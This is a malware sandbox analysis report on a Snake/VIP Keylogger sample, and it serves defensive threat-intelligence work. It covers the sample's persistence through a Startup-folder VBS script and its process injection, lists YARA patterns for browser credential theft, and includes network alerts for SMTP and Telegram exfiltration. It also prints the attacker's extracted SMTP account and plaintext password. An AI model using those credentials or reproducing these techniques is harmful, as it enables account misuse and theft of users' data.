Edit tour

Windows Analysis Report
drRbNknjyb.exe

Overview

General Information

Sample name:	drRbNknjyb.exe renamed because original name is a hash value
Original sample name:	b6d90d365f6c2c3df235252b27695386ebc26ebda21296ade171ae5d7c5f7724.exe
Analysis ID:	1632227
MD5:	c2be5c07a70580734f0ce6b8863166ed
SHA1:	e1e2cf75879f4d44aa80045cc0a5c3280ccc826e
SHA256:	b6d90d365f6c2c3df235252b27695386ebc26ebda21296ade171ae5d7c5f7724
Tags:	exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

drRbNknjyb.exe (PID: 8144 cmdline: "C:\Users\user\Desktop\drRbNknjyb.exe" MD5: C2BE5C07A70580734F0CE6B8863166ED)

acrorrheuma.exe (PID: 732 cmdline: "C:\Users\user\Desktop\drRbNknjyb.exe" MD5: C2BE5C07A70580734F0CE6B8863166ED)

RegSvcs.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\drRbNknjyb.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 3180 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

acrorrheuma.exe (PID: 7212 cmdline: "C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe" MD5: C2BE5C07A70580734F0CE6B8863166ED)

RegSvcs.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "nasarabu@fatimaksa.com", "Password": "gWwdRIw1", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "nasarabu@fatimaksa.com", "Password": "gWwdRIw1", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x30078:$a1: get_encryptedPassword 0x303a1:$a2: get_encryptedUsername 0x2fe88:$a3: get_timePasswordChanged 0x2ff91:$a4: get_passwordField 0x3008e:$a5: set_encryptedPassword 0x31770:$a7: get_logins 0x316d3:$a10: KeyLoggerEventArgs 0x31338:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e38e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3da31:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc8e:$a4: \Orbitum\User Data\Default\Login Data 0x3e66d:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x30ccf:$s1: UnHook 0x30cd6:$s2: SetHook 0x30cde:$s3: CallNextHook 0x30ceb:$s4: _hook
0000000A.00000002.2533215372.0000000003021000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x30078:$a1: get_encryptedPassword 0x303a1:$a2: get_encryptedUsername 0x2fe88:$a3: get_timePasswordChanged 0x2ff91:$a4: get_passwordField 0x3008e:$a5: set_encryptedPassword 0x31770:$a7: get_logins 0x316d3:$a10: KeyLoggerEventArgs 0x31338:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e38e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3da31:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc8e:$a4: \Orbitum\User Data\Default\Login Data 0x3e66d:$a5: \Kometa\User Data\Default\Login Data
00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x30ccf:$s1: UnHook 0x30cd6:$s2: SetHook 0x30cde:$s3: CallNextHook 0x30ceb:$s4: _hook
0000000A.00000002.2533215372.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2533215372.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.2532846101.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2530860588.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2fe78:$a1: get_encryptedPassword 0x301a1:$a2: get_encryptedUsername 0x2fc88:$a3: get_timePasswordChanged 0x2fd91:$a4: get_passwordField 0x2fe8e:$a5: set_encryptedPassword 0x31570:$a7: get_logins 0x314d3:$a10: KeyLoggerEventArgs 0x31138:$a11: KeyLoggerEventArgsEventHandler
00000007.00000002.2532846101.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: acrorrheuma.exe PID: 732	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: acrorrheuma.exe PID: 732	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: acrorrheuma.exe PID: 732	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: acrorrheuma.exe PID: 732	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x332d8:$a1: get_encryptedPassword 0x335f7:$a2: get_encryptedUsername 0x330f2:$a3: get_timePasswordChanged 0x331fb:$a4: get_passwordField 0x332ee:$a5: set_encryptedPassword 0x35804:$a7: get_logins 0x35767:$a10: KeyLoggerEventArgs 0x353d0:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7556	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7556	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7556	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7556	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x65d46:$a1: get_encryptedPassword 0x66065:$a2: get_encryptedUsername 0x65b60:$a3: get_timePasswordChanged 0x65c69:$a4: get_passwordField 0x65d5c:$a5: set_encryptedPassword 0x68272:$a7: get_logins 0x681d5:$a10: KeyLoggerEventArgs 0x67e3e:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: acrorrheuma.exe PID: 7212	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: acrorrheuma.exe PID: 7212	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: acrorrheuma.exe PID: 7212	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: acrorrheuma.exe PID: 7212	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x89894:$a1: get_encryptedPassword 0x89bb3:$a2: get_encryptedUsername 0x896ae:$a3: get_timePasswordChanged 0x897b7:$a4: get_passwordField 0x898aa:$a5: set_encryptedPassword 0x8bdc0:$a7: get_logins 0x8bd23:$a10: KeyLoggerEventArgs 0x8b98c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7216	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.acrorrheuma.exe.3910000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.acrorrheuma.exe.3910000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.acrorrheuma.exe.3910000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.acrorrheuma.exe.3910000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e278:$a1: get_encryptedPassword 0x2e5a1:$a2: get_encryptedUsername 0x2e088:$a3: get_timePasswordChanged 0x2e191:$a4: get_passwordField 0x2e28e:$a5: set_encryptedPassword 0x2f970:$a7: get_logins 0x2f8d3:$a10: KeyLoggerEventArgs 0x2f538:$a11: KeyLoggerEventArgsEventHandler
6.2.acrorrheuma.exe.3910000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c58e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bc31:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be8e:$a4: \Orbitum\User Data\Default\Login Data 0x3c86d:$a5: \Kometa\User Data\Default\Login Data
6.2.acrorrheuma.exe.3910000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eecf:$s1: UnHook 0x2eed6:$s2: SetHook 0x2eede:$s3: CallNextHook 0x2eeeb:$s4: _hook
9.2.acrorrheuma.exe.2020000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.acrorrheuma.exe.2020000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.acrorrheuma.exe.2020000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.acrorrheuma.exe.2020000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e278:$a1: get_encryptedPassword 0x2e5a1:$a2: get_encryptedUsername 0x2e088:$a3: get_timePasswordChanged 0x2e191:$a4: get_passwordField 0x2e28e:$a5: set_encryptedPassword 0x2f970:$a7: get_logins 0x2f8d3:$a10: KeyLoggerEventArgs 0x2f538:$a11: KeyLoggerEventArgsEventHandler
9.2.acrorrheuma.exe.2020000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c58e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bc31:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be8e:$a4: \Orbitum\User Data\Default\Login Data 0x3c86d:$a5: \Kometa\User Data\Default\Login Data
9.2.acrorrheuma.exe.2020000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eecf:$s1: UnHook 0x2eed6:$s2: SetHook 0x2eede:$s3: CallNextHook 0x2eeeb:$s4: _hook
9.2.acrorrheuma.exe.2020000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.acrorrheuma.exe.2020000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.acrorrheuma.exe.2020000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.acrorrheuma.exe.2020000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x30078:$a1: get_encryptedPassword 0x303a1:$a2: get_encryptedUsername 0x2fe88:$a3: get_timePasswordChanged 0x2ff91:$a4: get_passwordField 0x3008e:$a5: set_encryptedPassword 0x31770:$a7: get_logins 0x316d3:$a10: KeyLoggerEventArgs 0x31338:$a11: KeyLoggerEventArgsEventHandler
9.2.acrorrheuma.exe.2020000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e38e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3da31:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc8e:$a4: \Orbitum\User Data\Default\Login Data 0x3e66d:$a5: \Kometa\User Data\Default\Login Data
9.2.acrorrheuma.exe.2020000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x30ccf:$s1: UnHook 0x30cd6:$s2: SetHook 0x30cde:$s3: CallNextHook 0x30ceb:$s4: _hook
6.2.acrorrheuma.exe.3910000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.acrorrheuma.exe.3910000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.acrorrheuma.exe.3910000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.acrorrheuma.exe.3910000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x30078:$a1: get_encryptedPassword 0x303a1:$a2: get_encryptedUsername 0x2fe88:$a3: get_timePasswordChanged 0x2ff91:$a4: get_passwordField 0x3008e:$a5: set_encryptedPassword 0x31770:$a7: get_logins 0x316d3:$a10: KeyLoggerEventArgs 0x31338:$a11: KeyLoggerEventArgsEventHandler
6.2.acrorrheuma.exe.3910000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e38e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3da31:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc8e:$a4: \Orbitum\User Data\Default\Login Data 0x3e66d:$a5: \Kometa\User Data\Default\Login Data
6.2.acrorrheuma.exe.3910000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x30ccf:$s1: UnHook 0x30cd6:$s2: SetHook 0x30cde:$s3: CallNextHook 0x30ceb:$s4: _hook
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs" , ProcessId: 3180, ProcessName: wscript.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7556, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49732

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs" , ProcessId: 3180, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe, ProcessId: 732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\acrorrheuma.vbs

Suricata Signatures

ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:13:06.352628+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.5	49740	208.91.199.225	587	TCP
2025-03-07T21:13:06.352628+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.5	49735	208.91.199.225	587	TCP
2025-03-07T21:13:06.352628+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.5	49732	208.91.199.225	587	TCP
2025-03-07T21:14:06.708567+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.5	49739	208.91.199.225	587	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:13:20.223588+0100	2803305	3	Unknown Traffic	192.168.2.5	49697	104.21.48.1	443	TCP
2025-03-07T21:13:26.430705+0100	2803305	3	Unknown Traffic	192.168.2.5	49701	104.21.48.1	443	TCP
2025-03-07T21:13:32.527176+0100	2803305	3	Unknown Traffic	192.168.2.5	49709	104.21.48.1	443	TCP
2025-03-07T21:13:32.776071+0100	2803305	3	Unknown Traffic	192.168.2.5	49708	104.21.48.1	443	TCP
2025-03-07T21:13:39.077106+0100	2803305	3	Unknown Traffic	192.168.2.5	49719	104.21.48.1	443	TCP
2025-03-07T21:13:41.643596+0100	2803305	3	Unknown Traffic	192.168.2.5	49722	104.21.48.1	443	TCP
2025-03-07T21:13:42.339838+0100	2803305	3	Unknown Traffic	192.168.2.5	49724	104.21.48.1	443	TCP
2025-03-07T21:13:51.412547+0100	2803305	3	Unknown Traffic	192.168.2.5	49731	104.21.48.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:13:15.165092+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49695	132.226.247.73	80	TCP
2025-03-07T21:13:17.852648+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49695	132.226.247.73	80	TCP
2025-03-07T21:13:21.212082+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49698	132.226.247.73	80	TCP
2025-03-07T21:13:26.774491+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49702	132.226.247.73	80	TCP
2025-03-07T21:13:29.711955+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49702	132.226.247.73	80	TCP
2025-03-07T21:13:33.488282+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49712	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:13:44.470247+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49725	149.154.167.220	443	TCP
2025-03-07T21:13:57.762474+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49736	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: drRbNknjyb.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe

Avira: detection malicious, Label: TR/AD.ShellcodeCrypter.nkjzg

Found malware configuration

Source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "nasarabu@fatimaksa.com", "Password": "gWwdRIw1", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
Source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nasarabu@fatimaksa.com", "Password": "gWwdRIw1", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: drRbNknjyb.exe	Virustotal: Detection: 72%			Perma Link
Source: drRbNknjyb.exe	ReversingLabs: Detection: 63%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack	String decryptor: nasarabu@fatimaksa.com
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack	String decryptor: gWwdRIw1
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack	String decryptor: us2.smtp.mailhostbox.com
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack	String decryptor: 587
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: drRbNknjyb.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49696 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49704 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49736 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: acrorrheuma.exe, 00000006.00000003.1304161619.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000006.00000003.1303104677.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000003.1422935990.0000000004320000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000003.1414155162.0000000004180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: acrorrheuma.exe, 00000006.00000003.1304161619.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000006.00000003.1303104677.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000003.1422935990.0000000004320000.00000004.00001000.00020000.00000000.sdmp, acrorrheuma.exe, 00000009.00000003.1414155162.0000000004180000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0445A GetFileAttributesW,FindFirstFileW,FindClose,	3_2_00E0445A
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0C6D1 FindFirstFileW,FindClose,	3_2_00E0C6D1
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_00E0C75C
